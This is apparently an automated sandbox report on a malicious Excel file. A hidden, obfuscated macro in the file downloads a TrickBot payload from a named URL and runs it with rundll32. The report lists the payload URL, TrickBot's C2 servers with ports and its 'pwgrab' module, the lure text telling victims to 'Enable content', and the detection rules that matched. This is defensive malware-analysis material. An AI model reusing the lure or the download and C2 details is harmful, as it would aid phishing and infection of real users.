Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 446446.xls

Overview

General Information

Sample Name:446446.xls
Analysis ID:385552
MD5:1b62b4f4b16d6219dce4c6d145c5af79
SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2056 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2564 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2588 cmdline: rundll32 ..\fdinmd.fii,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2604 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
446446.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x165db:$e1: Enable Editing
  • 0x16325:$e3: Enable editing
  • 0x163f7:$e4: Enable content

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.rundll32.exe.780000.2.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
          4.2.rundll32.exe.650000.0.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            4.2.rundll32.exe.780000.2.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

              Software Vulnerabilities:

              barindex
              Document exploit detected (drops PE files)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 4HeVw[1].perclick.0.drJump to dropped file
              Document exploit detected (UrlDownloadToFile)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
              Source: global trafficDNS query: name: living-traditions.com
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 64.207.186.30:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 64.207.186.30:80
              Source: global trafficHTTP traffic detected: GET /blogs/click.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: living-traditions.comConnection: Keep-Alive
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1281B7DE.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /blogs/click.php HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: living-traditions.comConnection: Keep-Alive
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: unknownDNS traffic detected: queries for: living-traditions.com
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
              Source: 446446.xls, 51DE0000.0.drString found in binary or memory: http://living-traditions.com/blogs/click.php
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

              System Summary:

              barindex
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
              Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 14 0 Protected Vie
              Source: Screenshot number: 4Screenshot OCR: Enable content" to oerform Microsoft Office Decrvotion Core to start V Q R S IE"]' ^ Enable Edit
              Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
              Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
              Source: Document image extraction number: 3Screenshot OCR: Enable Content
              Source: Document image extraction number: 4Screenshot OCR: Enable Editing
              Source: Document image extraction number: 13Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
              Source: Document image extraction number: 13Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
              Found Excel 4.0 Macro with suspicious formulasShow sources
              Source: 446446.xlsInitial sample: CALL
              Source: 446446.xlsInitial sample: EXEC
              Found obfuscated Excel 4.0 MacroShow sources
              Source: 446446.xlsInitial sample: High usage of CHAR() function: 39
              Source: 446446.xlsInitial sample: High usage of CHAR() function: 26
              Office process drops PE fileShow sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
              Source: 446446.xlsOLE indicator, VBA macros: true
              Source: 446446.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
              Source: rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
              Source: classification engineClassification label: mal96.troj.expl.evad.winXLS@7/7@1/1
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC532.tmpJump to behavior
              Source: 446446.xlsOLE indicator, Workbook stream: true
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_007C27CB push dword ptr [edx+14h]; ret
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_007C2720 push dword ptr [edx+14h]; ret
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclickJump to dropped file
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

              Stealing of Sensitive Information:

              barindex
              Yara detected TrickbotShow sources
              Source: Yara matchFile source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.650000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected TrickbotShow sources
              Source: Yara matchFile source: 00000004.00000002.2089168736.0000000000650000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089228876.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2089212647.0000000000780000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.650000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.780000.2.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting21Path InterceptionProcess Injection11Masquerading121OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution33Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.2.rundll32.exe.780000.2.unpack100%AviraHEUR/AGEN.1138157Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://www.icra.org/vocabulary/.0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
              http://living-traditions.com/blogs/click.php0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              living-traditions.com
              		64.207.186.30
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://living-traditions.com/blogs/click.phpfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpfalse
                  		high
                  http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                    		high
                    http://investor.msn.comrundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                      		high
                      http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                        		high
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2090115718.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089561983.0000000002137000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                          		high
                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2089923070.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089354502.0000000001F50000.00000002.00000001.sdmpfalse
                            		high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            64.207.186.30
                            		living-traditions.comUnited States
                            		398110GO-DADDY-COM-LLCUSfalse

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:385552
                            Start date:12.04.2021
                            Start time:17:05:10
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 5m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:446446.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal96.troj.expl.evad.winXLS@7/7@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 32.1% (good quality ratio 25%)
                            • Quality average: 58.1%
                            • Quality standard deviation: 41.3%
                            HCA Information:
                            • Successful, ratio: 83%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .xls
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • TCP Packets have been reduced to 100
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/385552/sample/446446.xls

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            17:05:41API Interceptor1x Sleep call for process: rundll32.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            GO-DADDY-COM-LLCUSdocuments-1982636004.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            documents-1982636004.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            documents-466266883.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            documents-466266883.xlsmGet hashmaliciousBrowse
                            • 107.180.50.162
                            Processed APR12.xlsxGet hashmaliciousBrowse
                            • 192.169.223.13
                            NdBLyH2h5d.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            4oItdZkNOZ.exeGet hashmaliciousBrowse
                            • 107.180.50.167
                            Portfolio.exeGet hashmaliciousBrowse
                            • 72.167.241.46
                            12042021493876783,xlsx.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            CIVIP-8287377.exeGet hashmaliciousBrowse
                            • 184.168.177.1
                            MT103_004758.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                            • 184.168.131.241
                            Swift002.exeGet hashmaliciousBrowse
                            • 50.62.160.230
                            36ne6xnkop.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            56UDmImzPe.dllGet hashmaliciousBrowse
                            • 107.180.90.10
                            Shipping doc&_B-Landen.exeGet hashmaliciousBrowse
                            • 50.62.137.41
                            Statement-ID261179932209970.vbsGet hashmaliciousBrowse
